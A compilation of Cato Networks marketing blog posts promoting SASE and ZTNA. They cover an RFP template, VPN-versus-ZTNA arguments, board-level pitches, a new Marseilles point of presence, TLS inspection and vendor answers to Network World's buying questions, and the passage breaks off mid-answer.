Understand your proposed vendors architecture, what the architecture includes, what it does and where it is placed (branch, device, cloud.) Comprehending vendor architecture will allow you to better determine how a vendor scales, how they address failures, deliver resiliency, etc.
3. Solution Capabilities
Deep dive into your proposed vendor functionalities. The idea is to select all selections relevant to your proposed SASE deployment, and have the vendor fill them out.
SD-WAN
Receive a thorough exploration of a proposed vendor’s SD-WAN offering, covering link management, traffic routing and QoS, voice and latency-sensitive traffic, throughput and edge devices, monitoring and reporting, site provisioning, gradual deployment / co-existence with legacy MPLS networks.
Security
Understand traffic encryption, threat prevention, threat detection, branch, cloud and mobile security, identity and user awareness, policy management and enforcement, as well as security management analytics and reporting.
Cloud
Determine vendor components needed to connect a cloud datacenter to the network, amongst other areas.
Mobile (SDP / ZTNA)
Understand how vendors connect a mobile user to the network, their available mobile solutions for connecting mobile users to WAN and cloud, and other key areas.
Global
Explore your vendor’s global traffic optimization, describe how they optime network support to mobile users, and more.
4. Support and Services
Evaluate service offering and managed services. This is the perfect time to ask and understand whether your proposed vendor uses “follow-the-sun" support models and decide whether you want a self-managed, fully managed, or co-managed service.
Support and Professional services
Understand if vendors abide by “follow-the-sun,” support, their hours of support and more.
Managed Services
Get a sense of vendor managed services in several key areas.
Next Steps: Get the Full SASE RFP / RFI Template
Whether you’re new to SASE or a seasoned expert, successful SASE vendor selection starts with asking the right questions. When you know the correct questions to ask, it’s easy to understand if a SASE offering can meet the needs of your organization both now and in the future. Download Cato Network’s full SASE RFP / RFI Made Easy Template, to begin your SASE success story.
Zero trust network access (ZTNA) is an integral part of an enterprise security strategy, as companies move to adopt zero trust security principles and adapt...
Don’t Ruin ZTNA by Planning for the Past Zero trust network access (ZTNA) is an integral part of an enterprise security strategy, as companies move to adopt zero trust security principles and adapt to more distributed IT environments. Legacy solutions such as virtual private networks (VPNs) are ill-suited to the distributed enterprise and do not provide the granular access controls necessary to protect an organization against modern cyber threats.
However, not all ZTNA solutions are created equal. In some cases, ZTNA solutions are designed for legacy environments where employees and corporate resources are located on the corporate LAN. Deploying the wrong ZTNA solution can result in tradeoffs between network performance and security.
Where ZTNA Can Go Wrong
Three of the primary ways in which ZTNA goes wrong are self-hosted solutions, web-only solutions, and solutions only offering agent-based deployments.
Self-Hosted Solutions
Some ZTNA solutions are designed to be self-hosted or self-managed. An organization can deploy a virtual ZTNA solution on-prem or in the cloud and configure it to manage access to the corporate resources hosted at that location.
These self-hosted ZTNA solutions are designed based on a perimeter-focused security model that no longer meets the needs of an organization’s IT assets. Self-hosted ZTNA is best suited to protecting locations where the virtual appliance can be deployed, such as in an on-prem data center or an Infrastructure as a Service (IaaS) cloud service.
However, many organizations use a variety of cloud services, including Software as a Service (SaaS) offerings where a self-hosted ZTNA solution cannot be easily deployed. This and the fact that expanding self-hosted ZTNA to support new sites requires additional solutions or inefficient routing, means that these solutions are less usable and offer lower network performance than a cloud-native solution.
Web-Only Solutions
Often, security programs focus too much on the more visible aspects of an organization’s IT infrastructure. Web security focuses on websites and web apps instead of APIs, and ZTNA is targeted toward the protection of enterprise web apps.
However, companies commonly use various non-web applications as well. For example, companies may want to provide access to corporate databases, remote access protocols such as SSH and RDP, virtual desktop infrastructure (VDI), and other applications that do not run over HTTP(S).
A ZTNA solution needs to provide support for all apps used by an enterprise. This includes the ability to manage access to both web and non-web enterprise applications.
[boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink]
Only Agent-Based Deployment
Some ZTNA solutions are implemented using agents that are deployed on each user’s endpoint. These agents interact with a self-hosted or cloud-based broker that allows or denies access to corporate resources based on role-based access controls. By using agents, a ZTNA solution can provide a more frictionless experience to users.
While an agent-based deployment has its benefits, it may not be a fit for all devices. The shift to remote and hybrid work has driven the expanded adoption of bring your own device (BYOD) policies and the use of mobile devices for work. These devices may not be able to support ZTNA agents, making it more difficult to manage users’ access on these devices.
Support for agent-based deployments can be a significant asset for a ZTNA solution. However, implementing ZTNA only via agents deployed on the endpoint can result in some devices being unable to access corporate resources or being forced to use workarounds that could degrade performance or security.
Choose the Right ZTNA Solution
ZTNA provides a superior alternative to VPNs for secure remote access. However, the success of an organization’s ZTNA deployment can depend on selecting and deploying the right ZTNA solution.
Some key requirements to look for when evaluating ZTNA solutions include:
Globally Distributed Service: ZTNA solutions that are self-managed and can only be deployed in certain locations create tradeoffs between the performance and security of corporate applications. A ZTNA solution should be responsive everywhere so that employees can easily access corporate resources hosted anywhere, which can only be achieved by a globally distributed, cloud hosted, ZTNA solution.
Wide Protocol Support: Many of the most visible applications used by companies are web-based (webmail, cloud-based data storage, etc.). However, other critical applications may use different protocols yet have the same need for strong, integrated access management. A ZTNA solution should offer support for a wide range of network protocols, not just HTTP(S).
Agentless Option: Agent-based ZTNA solutions can help to achieve better performing and more secure remote access management; however, they are not suitable for all devices and use cases. A ZTNA solution should offer both agent-based and agentless options for access management.
Cato SASE Cloud offers ZTNA as part of an integrated Secure Access Service Edge (SASE) solution. By moving access control and other security and network optimization functions to cloud-based solutions, Cato SASE Cloud ensures that ZTNA services are accessible from anywhere and support a range of protocols. Also, with both agent-based and agentless options, Cato SASE Cloud ensures that all users have the ability to efficiently access corporate resources.
Introduction: Discussing Transformation with the Board Technology is a strategic requirement for every global organization and its board of directors, regardless of industry. No one...
Talking SASE to Your Board: A CIO’s Guide to Getting to ‘Yes’ Introduction: Discussing Transformation with the Board
Technology is a strategic requirement for every global organization and its board of directors, regardless of industry. No one is immune from the machinations of technological evolution and the associated disruption that follows. As a result, we can no longer separate business strategy from technology strategy, forcing corporate boards to converge their decision-making processes around a strategic agenda of innovation and risk-mitigation. So, CIOs must take an innovative approach when discussing any transformational change with the board.
How to Position Network Transformation to the Board
Network transformation is a game-changing strategy that helps drive business growth and market acquisition. So, if not positioned effectively to address board-level concerns, it will impact the long-term ability to execute and advance business objectives. When addressing the board, CIOs must position such technology strategies with critical board-level concerns in mind and discuss them in the context of:
Can this strategy help us improve IT responsiveness and ability to support business growth?
What value will the business realize through this initiative?
What is the security impact of this strategy on our critical applications?
How would this strategy enable IT organizations to better mitigate increasing security risk?
What would be the short- and long-term financial impact of this initiative?
What is the impact of our current and next-gen IT talent?
Core to discussing these strategies is articulating the necessity of simplification, optimization, and risk-mitigation in delivering business outcomes through network transformation. And this is where Secure Access Service Edge (SASE) becomes that strategic conversation for board-level engagement.
[boxlink link="https://www.catonetworks.com/resources/your-first-100-days-as-cio-5-steps-to-success/?utm_source=blog&utm_medium=top_cta&utm_campaign=first_100_days_cio"] Your First 100 Days as CIO: 5 Steps to Success | EBOOK [/boxlink]
SASE is the network transformation strategy that addresses board-level concerns around risk, growth, and financial flexibility. SASE converges networking and security capabilities into a single high-performing cloud-native architecture that allows organizations to scale core business operations through efficiency and performance, while extending consistency in policy and protections. So, presenting a SASE strategy to the board requires CIOs to be crisp and clear when highlighting key business benefits.
[caption id="attachment_25242" align="alignnone" width="724"] Figure 1[/caption]
A Conversational Guide to Engaging the Board on SASE
In February 2019, Deloitte defined a 3-dimension conversation model for CIOs when engaging technology boards. This engagement model defines the thought processes of board members when evaluating technology initiatives for sustaining business growth and maximizing balance sheets.
[caption id="attachment_25244" align="alignnone" width="724"] Figure 2[/caption]
To influence the board’s decision-making process, CIOs can lean on this model to guide their discussion of SASE’s positive impact on business growth and sustainability. While SASE may not speak specifically to each sub-dimension of the Deloitte model, the core focus on Strategy, Risk and Financial Performance can be adapted as a conversation guide when discussing SASE and Network Transformation.
Highlight the Strategic Value of SASE
Disruptive technology drives business growth and market share acquisition. However, CIOs should emphasize SASE not as a disruptive technology, rather as a disruptive approach to existing technologies. When positioning SASE to boards, CIOs should emphasize the strategic potential of SASE’s disruptive approach to simplifying network operations, which by extension, accelerates business growth.
CIOs must articulate the strategic business benefits of converging networking and security functions into a single cloud-native software stack with unlimited scalability to support business growth. An obvious benefit is how SASE accelerates and optimizes access to critical applications, enhancing the collection, analysis, and securing of data, while improving user experiences and efficiency. Another benefit is how SASE eliminates scaling challenges when more capacity is required to service business growth and expansion.
An imperative for CIOs is to highlight use cases where SASE proves its strategic value across the entire enterprise. Successful SASE implementations makes it easier to pursue Cloud Migration, Work-From-Home (WFH), UCaaS, and Global Expansion projects, just to name a few. Through these, we observe how SASE not only eliminates networking and security headaches, but it also streamlines the efforts of IT teams, allowing them to place more focus on these strategic initiatives. SASE has now become that true platform for digital transformation and an enabler of business growth.
In short, CIOs must emphasize how SASE enables the network to scale at the speed of business, instead of the business being limited by the rigid, inflexibility of the network. This approach allows CIOs to demonstrate SASE’s strategic value to the overall business by removing technical challenges that limit growth.
Conversation Tips
SASE as a disruptive approach to simplifying network operations
SASE as a “Growth Enabler” – optimized access improves business operations
Unlimited scalability at the speed of business
[caption id="attachment_25250" align="alignnone" width="724"] Figure 3[/caption]
Present the Risk-mitigation Value of SASE
No one is immune to cyber risk, and boards will naturally question cyber readiness for critical projects that support business growth. Typically, discussions around risk are fragmented along network support for new initiatives, and security risk to data and privacy. This overlooks the obvious linkage between the two, but SASE allows CIOs to blend these conversations to address critical board-level concerns.
Considering this, presenting the risk-mitigation value of SASE requires CIOs to address a key imperative of most boards – SASE must help overcome increased complexity and mitigate cyber risks today and well into the future.
Years of acquiring point products to solve point problems have bloated technology environments, resulting in security blind spots, increased complexity, and unmanageable risk. SASE proves its risk mitigation value by simplifying protection schemes, increasing visibility, improving threat detection and response, unifying security policies, and facilitating easier auditing. CIOs must also emphasize SASE’s simplistic Zero-Trust access approach to critical applications, delivering consistent policy enforcement across the entire network.
Finally, CIO’s must outline how SASE enable organizations to meet regulatory and compliance mandates and policies. This conversational approach re-enforces SASE’s risk-mitigation value and alleviates one of the biggest board-level concerns – the risk of ransomware and business disruption.
Conversation Tips
Highlight cyber risks without SASE –complexity, blind spots, and reputation loss
Risk Mitigation value – holistic data protection schemes
True SASE is a platform that enables compliance mandates
[caption id="attachment_25252" align="alignnone" width="724"] Figure 4[/caption]
Discuss SASE as a Financial Performance Enabler
Boards are laser-focused on the long-term financial performance goals of the business. The board needs to understand how network transformation will improve their balance sheets and customer retention. While many CIOs hesitate to link technology investments to financial performance metrics, articulating the positive impact of SASE on financial performance can position it as an ROI-enabler.
In our whitepaper, “ROI of Doing Nothing”, we highlight the long-term financial impact of delaying network transformation with SASE. Becoming a Stage 1 company – transition early to anticipate challenges vs. being a Stage 2 company – delay results in increased requirements and subsequent costs, comes down to the overall financial burden organizations are prepared to withstand. CIOs must promote the positive ROI of SASE in securing the long-term financial structure of the business.
When evaluating the feasibility of network transformation with SASE, CIOs must speak to the business and talent efficiencies to be gained. Today, most enterprises exhaust considerable resources running and maintaining inefficient infrastructures. This often produces outages across the network, which impacts operations across the entire business. The financial impact of this is not only measured in maintenance contracts and renewal/upgrade fees, but also in application availability, performance, and scalability.
SASE reduces costs by retiring expensive and inefficient systems, and this also directly impacts their IT talent performance. Similar to the strategic value, less time spent on mundane technical support activities enables IT teams to direct their support efforts towards strategic, revenue-generating initiatives. This increases revenue generated per-head, thus improving the operational cost model.
Highlighting key performance metrics related to revenue and ROI will gain broad consensus for SASE projects. Mapping key performance requirements into business ROI gained via SASE, demonstrates how it not only transforms networking and security, but also overall IT and business operations that impact the bottom-line.
Conversation Tips
SASE as an ROI enabler – lower TCO
Delaying SASE – impacts long-term cost structures
IT support for revenue-generating initiatives
[caption id="attachment_25254" align="alignnone" width="724"] Figure 5[/caption]
A SASE Engagement Model Allows for CIO-Board Partnership
Justifying network transformation can be challenging considering it requires a paradigm shift towards a new way of viewing IT operations and its impact on the broader business. By following a simple board-level engagement model focusing on Strategy, Risk and Performance, CIOs can build a more compelling discussion on the numerous advantages in SASE that extend far beyond simple network and security efficiencies. It is important to develop that CIO-Board partnership that explores these through a business outcome lens. SASE pursued with strategic business enablement in mind alleviates the key board-level concerns, while empowering CIOs to deliver the resilient, cost-effective converged platform that enables optimal IT operations, mitigates risk, and produces long-term ROI.
Engaging the board on new technology approaches such as SASE does not have to be scary. SASE provides a new way to envision the Digital Infrastructure of the Future, and highlighting the main concerns of most board members, is the most direct approach to discuss this topic. This writing provides a simple guide for mapping board-level concerns to the intrinsic advantages of SASE, while providing a roadmap to realizing the key benefits.
To learn more about how CIO’s succeed in this digital era, download our “First 100 Days as a CIO” guide.
Cato just announced the opening of our new PoP in Marseilles, France. Marseilles is our second PoP in France (Paris being the first) and our...
Cato Expands to Marseilles and Improves Resiliency Within France Cato just announced the opening of our new PoP in Marseilles, France. Marseilles is our second PoP in France (Paris being the first) and our 20th in EMEA. Overall, Cato SASE Cloud is comprised of 70+ PoPs worldwide, bringing Cato’s capabilities to more than 150 countries.
As with all our PoPs, Marseilles isn’t just a “gateway” that secures traffic to and from the Internet. Cato PoPs are far more powerful. Like the rest of our PoPs, Marseilles will run Cato's Single Pass Cloud Engine (SPACE), Cato's converged cloud-native software. Cato SPACE provides enterprise-grade threat prevention, data protection, and global traffic optimization for East-West traffic to other Cato PoPs and North-South traffic to the Internet or the cloud.
Cato SPACE sets speed records in the SASE world by processing up to 3 Gbps of traffic per site with full decryption and all security engines active at line rate. Cato SPACE is so effective and reliable, that enterprises can replace legacy MPLS networks and security appliances.
The Marseilles PoP, like all of our PoPs, is equipped with multiple compute nodes running many SPACE engines. When a site’s traffic hits the Marseilles PoP, the traffic flow is immediately assigned to the most available SPACE engine.
Should a SPACE engine fail within a PoP, flows are automatically processed by another SPACE instance. Should the datacenter hosting a Cato PoP fail, users and resources automatically reconnect to the next available PoP as all PoPs are equipped with enough surplus capacity to accommodate the additional load.
[boxlink link="https://www.catonetworks.com/news/cato-networks-strengthens-sase-presence-in-france-with-new-point-of-presence-pop-in-marseilles/?utm_source=blog&utm_medium=top_cta&utm_campaign=marseilles_pop_pr"] Cato Networks Strengthens SASE Presence in France with New Point of Presence (PoP) in Marseilles | News Release [/boxlink]
A case in point was the recent Interxion datacenter outage. The datacenter housed the London Metal Exchange and Cato's London PoP. The outage disrupted the Exchange for nearly five hours. Cato customers were also impacted – for 30 seconds – as London-connected sites, and users automatically and transparently moved over to Cato's Manchester and Dublin PoPs. In the case of Marseilles, Cato's self-healing architecture automatically and transparently moves sites and users to the next best PoP, likely the one in Paris.
"Before Cato, there were outages, complaints, and negative feedback from several internal teams about the service from our major international MPLS provider," said Thomas Chejfec, Group CIO of Haulotte, a global manufacturer of materials and people lifting equipment. Haulotte moved to Cato after facing three years of delays and cost overruns, rolling out MPLS to its more than 30 offices across Western Europe, North America, South America, Africa, and Asia Pacific. "Since deploying Cato, the network is no longer a topic of discussion with users," says Chejfec. "We never hear about it anymore."
Of course, delivering a great cloud platform means having great partners. Cato's complete range of networking and security capabilities are available today from numerous partners across France, including Ava6, ADVENS, Anetys, Hexanet, IMS Networks, OCD, NEOVAD, Nomios, Rampar, Sasety, and Selceon.
Cato continues to work hard to deliver and grow our global network. Marseilles is our latest launch, but hardly our last. Expect us to continue adding PoPs and growing our global footprint so you can connect and secure your offices and users wherever they may be located.
TLS or Transport Layer Security is the evolution of SSL, and the terms are often used interchangeably. TLS is designed to increase security by encrypting...
Don’t Turn a Blind Eye to TLS Traffic TLS or Transport Layer Security is the evolution of SSL, and the terms are often used interchangeably. TLS is designed to increase security by encrypting data end-to-end between two points, ideally preventing bad actors from having visibility into the traffic of your web session. However, threat actors have also come to see the value in utilizing TLS encryption for delivering malware and evading security controls.
This can be indirect via the leveraging common sanctioned SaaS applications (Office365, Box, Dropbox, GDrive, etc.) as delivery vectors or direct by using free certificates from Let’s Encrypt. Let’s Encrypt is a free and open certificate authority created and run for the benefit of the public. Despite being designed for good, threat actors wasted no time in leveraging the advantages of free encryption in their activities.
The point here is that most traffic, good and bad, is now TLS encrypted and can create challenges for IT and security teams.
TLS Inspection to the Rescue
TLS inspection is almost completely transparent to the end-user and sits between the user and their web applications. Like the malicious activity known as a man-in-the-middle attack, TLS inspection intercepts the traffic, enabling inspection by security engines. For this to work without disruption to the end-user, an appropriate certificate must be installed on the client device.
TLS inspection has been available for some time now but isn’t widely used due to a variety of reasons, primarily cost and complexity. Historically NGFW or other appliances have been the source of TLS inspection capabilities for organizations. With any appliance, there is a fixed amount of capability, and the more features you enable, the lower the throughput. TLS inspection is no different and often requires double (or more) hardware investment to accomplish at scale. Additionally, TLS inspection brings up privacy concerns about financial and health information that are not always easily addressed by legacy products.
[boxlink link="https://www.catonetworks.com/resources/tls-decryption-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=tls_demo"] Cato Demo | TLS Inspection in Minutes [/boxlink]
SASE Makes it Possible
SASE or Secure Access Service Edge removes most of the challenges around TLS decryption, allowing organizations to secure their users and locations more effectively. SASE offers TLS inspection capabilities as product functionality, with no need to size and deploy hardware. Simply create desired exceptions (or alternatively specify what traffic to inspect), deploy certificates to endpoints, and enable the feature. This easy alternative to NGFW TLS decryption makes it possible for organizations to gain visibility into the 95% of their traffic that is hiding in TLS. There are still some challenges, primarily certificate pinned websites and applications. Most SASE providers will manage a bypass list of these for you, but you can always improve your security posture by blocking un-inspectable traffic where it makes sense.
Gain Visibility Today
The question remains, if you are not inspecting TLS today, why aren’t you? You have most likely invested in security technologies such as IPS, CASB, SWG, Next-Generation Antimalware, DLP, etc., but without complete visibility, these tools cannot work effectively. Security engines are a bit like the x-ray machine at airport security, they reveal the contents of luggage (packets) to identify anything bad. Now imagine if you are in the security line and they are only inspecting 5 out of every 100 bags. How secure does this make you feel, would you still get on the plane?
SASE has removed many of the obstacles to adopting TLS inspection and provides complete visibility to all security engines to maximize their value. If you have not considered SASE yet, now may be the time. If you already have SASE and do not know where to start with TLS inspection, start small. You should be able to selectively enable the capability for risky categories of URLs and applications and then increase the scope as your comfort level grows.
See this quick video demo on how easy it is to enable TLS inspection with Cato Networks!
In the past, most of an organization’s employee and IT resources were located on the enterprise LAN. As a result, enterprise security models were focused...
Planning for the Distributed Enterprise of the Future In the past, most of an organization’s employee and IT resources were located on the enterprise LAN. As a result, enterprise security models were focused on defending the perimeter of the corporate network against external threats. However, the face of the modern enterprise is changing rapidly. Both users and IT resources are moving off of the corporate LAN, creating new employee and service network edges.
Distributed Employee Edges
The most visible sign of the evolution of the modern enterprise is the growing acceptance of remote work. Employees working remotely is nothing new, even for organizations without formal telework programs. Business travel, corporate smartphones, and other factors have led to corporate data and resources being accessed from outside the enterprise network, often without proper support or security.
The pandemic normalized remote work as businesses found that their employees could effectively work from basically anywhere. In fact, many businesses found that remote work increased productivity and decreased overhead. As a result, many businesses plan to support at least hybrid work indefinitely, and telework has become a common incentive for hiring and retaining employees.
Scattered Service Locations
While the rapid growth and distribution of employee edges can be attributed to the pandemic, service edges have been expanding for years. The emergence of cloud-based data storage and application hosting has transformed how many organizations do business.
The cloud provides numerous benefits, but one of its major selling points is the wide range of service options that organizations can take advantage of. Companies can move enterprise data to a cloud data center, outsource infrastructure management to a third-party provider for hosted applications, or take advantage of Software as a Service (SaaS) applications that are developed and hosted by their cloud service provider.
Nearly all organizations use at least some cloud services, even if this is simply cloud-based email and data storage (G-Suite, Microsoft 365, etc.). However, many companies have not completely given up their on-prem infrastructure, hosting some data and applications locally to meet business needs or regulatory compliance requirements.
This mix of on-prem and cloud-based infrastructure complicates the corporate WAN. Both on-site and remote workers need high-performance, reliable, and secure access to corporate data and applications, regardless of where the user and application are located.
[boxlink link="https://www.catonetworks.com/resources/how-three-enterprises-delivered-remote-access-everywhere/?utm_source=blog&utm_medium=top_cta&utm_campaign=3_enterprises_delivered_remote_access"] How Three Enterprises Delivered Remote Access Everywhere | EBOOK [/boxlink]
Legacy Infrastructure Doesn’t Meet Modern Needs
Many organizations’ security models were designed for the era where employees and corporate IT assets were centralized on the corporate LAN. By deploying security solutions at the perimeter of the corporate network, organizations attempt to detect inbound threats and outbound data exfiltration before they pose a threat to the organization.
The perimeter-focused security model has many shortcomings, but one of the most significant is that it is designed for an IT infrastructure that no longer exists. With the expansion of telework and cloud computing, a growing percentage of an organization’s IT assets are now located outside the protected perimeter of the corporate LAN.
A major challenge that companies face when adapting to the growing distribution of their IT assets is that many of the tools that they are trying to use to do so are designed for the same outdated model. For example, virtual private networks (VPNs) were designed to provide point-to-point secure connectivity, such as between a remote worker and the enterprise network. This design doesn’t work when employees need secure access to resources hosted in various places (on-prem, cloud, etc.)
Trying to support a distributed workforce with legacy solutions creates significant challenges for an organization. VPNs’ design and lack of built-in security and access control result in companies routing all traffic through the corporate network for inspection, resulting in increased latency and degraded performance. It also creates challenges for IT personnel, who need to deploy and maintain complex and inflexible VPN-based corporate WANs.
ZTNA Enables Usable, Scalable Security
As companies’ workforces and infrastructure become more distributed, attempting to make the corporate WAN work with legacy solutions is not a sustainable long-term plan. A switch away from perimeter-focused technologies like VPNs is essential to the performance, reliability, and security of the enterprise network.
Zero trust network access (ZTNA) offers a superior alternative to VPNs that is better suited to the needs of the distributed enterprise of the future. Some advantages of a cloud-based ZTNA deployment include:
Global Accessibility: ZTNA can be hosted in the cloud, making it globally accessible. Once access decisions are made, traffic can be routed directly to its destination without a detour through the corporate network.
Granular Access Controls: VPNs are designed to provide legitimate users with unrestricted access to corporate resources. ZTNA provides access to a specific resource on a case-by-case basis, enabling more granular access management and better enforcement of least privilege.
Centralized Management: A VPN-based WAN for an organization with multiple sites and cloud-based infrastructure requires many independent links between different sites. ZTNA does not require these independent tunnels and can be centrally monitored and managed, simplifying network and security configuration and management.
Private Backbone: Cato’s ZTNA uses a private backbone to route traffic between sites. This improves the performance and reliability of network traffic beyond what is possible with the public Internet.
Solutions like VPNs are designed for an IT architecture that no longer exists and never will again. As companies adopt cloud computing and remote work they need infrastructure and security solutions designed for a distributed IT architecture. By deploying ZTNA with Cato, companies can improve network performance and security while simplifying management.
Zero-trust network access (ZTNA) is a superior remote access solution compared to virtual private networks (VPNs) and other legacy tools. However, many organizations are still...
Overcoming ZTNA Deployment Challenges with the Right Solution Zero-trust network access (ZTNA) is a superior remote access solution compared to virtual private networks (VPNs) and other legacy tools. However, many organizations are still relying on insecure and non-performant solutions rather than making the switch to ZTNA.
Why You Might Not Be Using ZTNA (But Should Be)
Often, companies have legitimate reasons for not adopting ZTNA - and below we take a closer look at some of the most common concerns:
“A VPN is Good Enough”
One of the simplest reasons why an organization may not want to upgrade their VPN to ZTNA is that they’ve always used a VPN and it has worked for them. If remote users can connect to the resources that they need, then it may be difficult to make a compelling case for a switch. However, even if an organization’s VPN infrastructure is performing well, there is still security to consider.
A VPN is designed to provide a remote user with unrestricted, private access to the corporate network. This means that VPNs lack application-level access controls and integrated security. For this reason, cybercriminals commonly target VPNs because a single set of compromised credentials can provide all of the access needed for a data breach, ransomware infection, or other attacks.
In contrast, ZTNA provides access on a case-by-case basis decided based on user and application-level access controls. If an attacker compromises a user’s account, then their access and the damage that they can do is limited by that user’s permissions.
“ZTNA is Hard to Deploy”
Deploying a new security solution can be a headache for an organization’s security team. They need to integrate it into an organization’s existing architecture, design a deployment process that limits business disruption, and perform ongoing configuration and testing to ensure that the solution works as designed. When an organization has a working VPN solution, then the overhead associated with switching to ZTNA may not seem worth the effort.
While installing ZTNA as a standalone solution may be complex, deploying it as part of a Secure Access Service Edge (SASE) solution can streamline the process. With a managed SASE solution, deployment only requires pointing infrastructure to the nearest SASE point of presence (PoP) and implementing the required access controls.
[boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink]
“VPNs are Required for Compliance”
Most companies are subject to various data protection and industry regulations. Often, these regulations mandate that an organization have certain security controls in place and may recommend particular solutions. For secure remote access, VPNs are commonly on the list of acceptable solutions due to their age and widespread adoption.
However, regulations are changing rapidly, and the limitations of VPNs are well known. As regulators start looking for and mandating a zero-trust approach to security within organizations, solutions like VPNs, which are not designed for zero trust, will be phased out of regulatory guidance.
While regulations still allow VPNs, many also either explicitly recommend ZTNA or allow alternative solutions that implement the required security controls. ZTNA provides all of the same functionality as VPNs but also offers integrated access control. When deployed as part of a SASE solution, ZTNA is an even better fit for regulatory requirements due to its integration with other required security controls and adoption of a least privileges methodology commonly required by regulatory frameworks such as UK NCSC Cyber Essentials and NIST. For organizations looking to achieve and maintain compliance with applicable regulations, making the move to ZTNA as soon as possible will decrease the cost and effort of doing so.
“We’ve Already Invested in Our VPN Infrastructure”
VPNs have been around for a while, so many organizations have existing VPN deployments. When the pandemic drove a move to remote work, the need to deploy remote work solutions as quickly as possible led many organizations to expand their existing VPN infrastructure rather than investigate alternatives. As a result, many organizations have invested in a solution that, to a certain degree, meets their remote work needs. These sunk costs can make ripping out and upgrading VPN infrastructure an unattractive proposition.
However, the differential in functionality between a VPN and a ZTNA solution can far outweigh these costs. ZTNA provides integrated access management, which can reduce the cost of a data breach and simplify an organization’s regulatory compliance strategy. A ZTNA solution that successfully prevents a data breach by blocking unauthorized access to sensitive data may have just paid for itself.
“Our Security Team is Already Overwhelmed with Our Existing Solutions”
Many organizations’ security teams are struggling to keep up. The cybersecurity skills gap means that companies are having trouble finding and retaining the skilled personnel that they need, and a sprawling array of security solutions creates overwhelming volumes of alerts and the need to configure, monitor, and manage various standalone solutions. As a result, the thought of deploying, configuring, and learning to use yet another solution may seem less than appealing.
Yet one of the main advantages of ZTNA is that it simplifies security monitoring and management, especially when deployed as part of a SASE solution. By integrating multiple security functions into a single network-level solution, SASE eliminates redundant solutions and enables security monitoring and management to be performed from a single console. By reducing the number of dashboards and alerts that analysts need to handle, SASE reduces the burden on security teams, enabling them to better keep up with an accelerating threat landscape and expanding corporate IT infrastructure.
ZTNA is the Future of Remote Access
Many organizations have solutions that - on paper - provide the features and functionality that they need to support a remote workforce and provide secure access to corporate applications. However, legacy solutions like VPNs lack critical access controls and security features that leave an organization vulnerable to attack.
As the zero trust security model continues to gain momentum and is incorporated into regulations, organizations will need solutions that meet their security needs and regulatory requirements. ZTNA meets these needs, especially as part of a SASE solution.
Last December, Network World published a thoughtful guide outlining the questions IT organizations should be asking when evaluating SASE platforms. It was an essential list...
How to Buy SASE: Cato Answers Network World’s 18 Essential Questions Last December, Network World published a thoughtful guide outlining the questions IT organizations should be asking when evaluating SASE platforms. It was an essential list that should be included in any SASE evaluation.
Too often, SASE is a marketing term applied to legacy point solutions, which is why we suspect these questions are even needed. By contrast, The Cato SASE Cloud is the world's first cloud-native SASE platform, converging SD-WAN and network security in the cloud. Cato Cloud connects all enterprise network resources including branch locations, the mobile workforce, and physical and cloud data centers, into a global and secure, cloud-native network service. With all WAN and Internet traffic consolidated in the cloud, Cato applies a suite of security services to protect all traffic at all times. In short, Cato provides all of the core SASE capabilities identified by NWW.
We are pleased to respond point-by-point to every issue raised. You should also check out our SASE RFP template to help with the valuation.
1. Does the vendor offer all of the capabilities that are included in the definition of SASE? If not, where are the gaps? If the vendor does claim to offer all of the features, what are the strengths and weaknesses? How does the maturity of the vendor offerings mesh or clash with your own strengths, weaknesses, and priorities? In other words, if your biggest need is Zero Trust, and the vendor's strength is SD-WAN, then the fit might not be right.
Yes, Cato provides all of the core capabilities NWW defines for SASE – and more. On the networking side, the Cato Global Private backbone connects 70+ PoPs worldwide. Locations automatically connect to the nearest PoP with our edge SD-WAN device, the Cato Socket. Cloud datacenters are connected via an agentless configuration, and cloud applications are connected through our cloud-optimized routing. Remote users connect in by using the Cato Mobile Client or clientless browser access.On the security side, Cato Security as a Service is a fully managed suite of enterprise-grade and agile network security capabilities, directly built into the Cato Global Private Backbone. Current security services include firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), IPS-as-a-Service (IPS), and Cloud Access Security Broker (CASB), and a Managed Threat Detection and Response (MDR) service.
2. How well integrated are the multiple components that make up the SASE? Is the integration seamless?
The Cato SASE Cloud is completely converged. The Cato SPACE architecture is a single software stack running in our PoPs. Enterprises manage and monitor networking, security, and access through a single application. All capabilities are available in context via a shared user interface. Objects created in one domain (such as security) are available in other domains (such as networking or remote access). (To see what we mean by seamless, check out this detailed walkthrough of the Cato Management Application.)
[boxlink link="https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider"] 5 Questions to Ask Your SASE Provider | eBook [/boxlink]
3. Assuming the vendor is still building out its SASE, what does the vendor roadmap look like? What is the vendor's approach in terms of building capabilities internally or through acquisition? What is the vendor's track record integrating past acquisitions? If building internally, what is the vendor's track record of hitting its product release deadlines?
Cato has demonstrated its ability to develop and bring capabilities to market. Since its founding in 2015, Cato has successfully developed and delivered the global SASE cloud, which is used today by more than 1000 enterprises. We regularly add new services and capabilities to our platform, such as December's announcement of more than 103 frontend improvements and updates to our backend event architecture. (Other additions included a Cloud Application catalog, a Threats dashboard, an Application Analytics dashboard, CASB launch, and updates to our managed detection and response (MDR) service that automated security assessments.)
4. Whose cloud is it anyway? Does the vendor have its own global cloud, or are they partnering with someone? If so, how does that relationship work in terms of accountability, management, SLAs, troubleshooting?
Cato owns and maintains the Cato SASE Cloud. The PoPs are on our hardware hosted in tier-3 datacenters, running Cato's cloud-native software stack. Every PoP is connected by at least two and many by four tier-1 carriers, who provide SLA-backed capacity. Cato's custom routing software constantly evaluates these paths identifying the shortest path for each packet.
Question for MSPs
Network World also included a series of questions specific to managed service providers (MSPs) that we'd like to address as well. Cato in addition to building a SASE platform is also a service provider so we took the liberty of responding to these questions as well.
1. How many PoPs do they have and where are they located? Does the vendor cloud footprint align with the location of your branch offices?
The Cato Global Private backbone currently serves 140 countries worldwide from more than 70 PoPs that we continue to expand each quarter.
2. Does the vendor have the scale, bandwidth, and technical know-how to deliver line-rate traffic inspection?
